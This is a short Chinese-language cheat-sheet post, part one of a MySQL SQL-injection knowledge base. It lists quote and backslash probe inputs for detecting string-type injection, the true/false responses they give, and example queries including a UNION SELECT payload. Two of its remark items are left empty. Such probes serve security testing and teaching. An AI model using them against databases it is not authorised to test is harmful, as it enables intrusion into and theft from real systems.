作者:沙胆建筑_829 | 来源:互联网 | 2023-05-28 16:51
Mysql缺省数据库information_schema在5以上版本可用mysql需要root权限测试注入:false意味着查询不可用true代表查询可用字符型:使用如下查询:se
Mysql
缺省数据库
information_schema 在5以上版本可用
mysql 需要root 权限
测试注入:
false意味着查询不可用
true代表查询可用
字符型:
使用如下查询:select * from table where id = ‘1‘;
‘ false
‘‘ true
" false
"" true
\ false
\\ true
example:
- SELECT * FROM Articles WHERE id = ‘1‘‘‘;
- SELECT 1 FROM dual WHERE 1 = ‘1‘‘‘‘‘‘‘‘‘‘‘‘‘UNION SELECT ‘2‘;
- select * from student where id = ‘1\\‘;
备注:
1.尽量多的使用’ 只要能够配对即可
2.
3.
sql注入知识库-mysql篇(1)